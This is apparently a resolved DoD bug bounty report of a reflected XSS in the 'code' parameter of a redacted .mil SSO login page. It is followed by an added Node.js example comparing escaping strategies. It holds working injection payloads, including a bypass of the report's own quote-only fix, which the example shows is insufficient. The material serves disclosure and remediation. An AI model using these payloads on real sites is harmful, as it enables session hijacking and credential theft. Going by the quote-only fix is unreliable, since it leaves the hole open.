XSS vulnerability found in javascript code of https://███.mil
Severity: Medium
## Vulnerability Details
### Description
Hello DoD Team,
I found an XSS vulnerability in the JavaScript code of ██████████.mil. The parameter ***code*** isn't sanitized enough to prevent an attack.
If you click the following link: https://███.mil/?code=xxx';%0d%0a!!!MALICIOUS%20CODE%20HERE!!!;%0d%0avar%20x='
the output looks as follows.
You can see the three injection points.
```html
<!doctype HTML>
<!-- BEGIN TopCategoriesDisplay.jsp --><!-- BEGIN SSORedirect.jsp -->
<script type="text/javascript">
function processUserLogon(action) {
    if(action == 'logon') {
        var e = document.getElementById("environment");
        env = e.options[e.selectedIndex].value;
        var logonIdParam = "";
        var userTypeParam = "";
        if(document.getElementById("logonId") != null) {
            logonIdParam = "&logonId=" + document.getElementById("logonId").value;
        }
        if(document.getElementById("userType") != null) {
            var userType = document.getElementById("userType");
            userTypeParam = "&userType=" + userType.options[userType.selectedIndex].value;
        }
        window.location.href = 'https://' + env + '/webapp/wcs/stores/servlet/ProcessUserSSO?catalogId=10051&langId=-1&storeId=' + 10801
            + '&sso=true&ssoAction=' + action + '&code=xxx';
        !!!MALICIOUS CODE HERE!!!;
        var x='' + logonIdParam + userTypeParam + '&uoa='
            + '&dodaac=' + document.getElementById('dodaac').value + '&json=' + document.getElementById('json').value;
    } else {
        window.location.href = 'ProcessUserSSO?catalogId=10051&langId=-1&sso=true&ssoAction=' + action + '&code=xxx';
        !!!MALICIOUS CODE HERE!!!;
        var x='';
    }
}
function getCode() {
    var clientId = "█████████";
    window.location.href = 'https://███████/portal/oauth2/authorize?response_type=code&client_id=' + clientId + '&redirect_uri=https://███.mil/webapp/wcs/stores/servlet/en/███?sso=true';
}
</script>
<script type="text/javascript">
ra2 = "false";
if ((document.referrer.indexOf('-ra2.') !== -1)) {
    ra2 = "true";
}
var clientId = "████████";
window.location.href = 'ProcessUserSSO?catalogId=10051&langId=-1&app='+clientId+'&ra2='+ra2+'&ssoAction=logon&code=xxx';
!!!MALICIOUS CODE HERE!!!;
var x='&uoa=';
</script>
<!-- END SSORedirect.jsp --><!-- END TopCategoriesDisplay.jsp -->
</html>
```
### Proof of Concept
https://███████.mil/?code=xxx';alert`XSS`;var%20x='
## Impact
The `code` parameter is written unencoded into a single-quoted JavaScript string literal in the SSO redirect script, in three places, so anyone who follows a crafted link executes attacker-controlled JavaScript in the origin of the login page before the redirect to ProcessUserSSO takes place. On a login page this can lead to credential theft, session hijacking, and redirection to phishing sites: the injected script can capture user input, change form actions, or read session cookies, letting the attacker impersonate the victim. Input validation, context-aware output encoding at the point where the value is written into the script, and a strong Content Security Policy (CSP) mitigate these risks.
## System Host(s)
███████.mil
## Affected Product(s) and Version(s)
Webserver
## CVE Numbers
## Steps to Reproduce
### Use the link:
https://███████.mil/?code=xxx';alert`XSS`;var%20x='
## Suggested Mitigation/Remediation Actions
Sanitize the character `'`:
```
' ===> \'
```
That should do it.
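Both the injection shown in the description (the `code` value closing the single-quoted string around the ProcessUserSSO URL) and the suggested fix are easiest to judge by running them. The following is an added example, not code from the report or from the affected site: it rebuilds the sink as a small server-side template (an assumption, simplified from the third script block in the output above), renders the request's `code` value three ways, and executes the result in a stub browser (`window` and `alert` are fakes) to see which rendering runs the injected `alert`. The quote-only escape stops the report's PoC payload but not a value that brings its own backslash, while an encoder for the JavaScript string context (modelled here on OWASP Java Encoder's `Encode.forJavaScript`, not the library itself) keeps the value inert and still delivers it unchanged to the redirect URL. The payloads are constructed for the example.

```javascript
// Added example, not from the original report or the affected site.
// The template, encoder and stub browser are assumptions that reproduce
// the shape of the sink shown in the report's output.

// Stand-in for the JSP: the request's `code` value is concatenated into a
// single-quoted JavaScript string literal (simplified from the third script block).
function renderSsoRedirect(code) {
  return (
    'var clientId = "client";\n' +
    "window.location.href = 'ProcessUserSSO?ssoAction=logon&code=" + code + "&uoa=';\n"
  );
}

// The remediation suggested in the report: turn ' into \' and nothing else.
function escapeQuoteOnly(value) {
  return value.replace(/'/g, "\\'");
}

// Context-aware encoder for a JavaScript string literal: every character that
// is not a letter or digit becomes \xHH or \uHHHH, so quotes, backslashes,
// line terminators, `<`, `>` and `/` can end neither the literal nor the
// <script> element. Modelled on OWASP Java Encoder's Encode.forJavaScript.
function encodeForJavaScript(value) {
  let out = "";
  for (let i = 0; i < value.length; i++) {
    const ch = value[i];
    if (/[A-Za-z0-9]/.test(ch)) {
      out += ch;
      continue;
    }
    const unit = value.charCodeAt(i); // UTF-16 unit; a surrogate pair becomes two \u escapes
    const hex = unit.toString(16).toUpperCase();
    out += unit < 0x100 ? "\\x" + hex.padStart(2, "0") : "\\u" + hex.padStart(4, "0");
  }
  return out;
}

// Stub browser: runs the rendered script with a fake `window` and `alert` and
// reports whether the attacker's alert fired and where the page would navigate.
function executeInStubBrowser(script) {
  const window = { location: { href: "" } };
  const alerts = [];
  try {
    new Function("window", "alert", script)(window, (...args) => alerts.push(String(args[0])));
  } catch (err) {
    return { alertFired: false, error: err.name, href: window.location.href };
  }
  return { alertFired: alerts.length > 0, error: null, href: window.location.href };
}

// The value a browser holds after evaluating the encoded literal: the encoder
// changes the representation in the page source, not the delivered content.
function decodeViaLiteral(value) {
  return new Function("return '" + encodeForJavaScript(value) + "';")();
}

// Constructed payloads: the report's PoC; one that defeats quote-only escaping
// by supplying its own backslash (\' becomes \\' and the string still closes);
// and one aimed at the HTML parser rather than the JavaScript parser.
const POC_PAYLOAD = "xxx';alert`XSS`;var x='";
const BYPASS_PAYLOAD = "xxx\\';alert`XSS`;//";
const SCRIPT_BREAKOUT = "</script><script>alert`XSS`</script>";

function compareMitigations() {
  const run = (code) => executeInStubBrowser(renderSsoRedirect(code)).alertFired;
  return {
    unescapedVsPoc: run(POC_PAYLOAD),                          // true: the report's finding
    quoteOnlyVsPoc: run(escapeQuoteOnly(POC_PAYLOAD)),         // false: the PoC is stopped
    quoteOnlyVsBypass: run(escapeQuoteOnly(BYPASS_PAYLOAD)),   // true: the string still closes
    encodedVsPoc: run(encodeForJavaScript(POC_PAYLOAD)),       // false
    encodedVsBypass: run(encodeForJavaScript(BYPASS_PAYLOAD)), // false
    quoteOnlyLeavesScriptTag: renderSsoRedirect(escapeQuoteOnly(SCRIPT_BREAKOUT)).includes("</script>"),      // true
    encodedLeavesScriptTag: renderSsoRedirect(encodeForJavaScript(SCRIPT_BREAKOUT)).includes("</script>"),    // false
  };
}

console.log(compareMitigations());
```

Run it with `node`; `compareMitigations()` reports which rendering let the injected `alert` execute. In the JSP the same result comes from calling an encoder for the JavaScript string context at each of the three places where `code` is concatenated into the script, so the raw parameter is never written into the page directly.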
## Report Stats
- Report ID: 2888784
- State: Closed
- Substate: resolved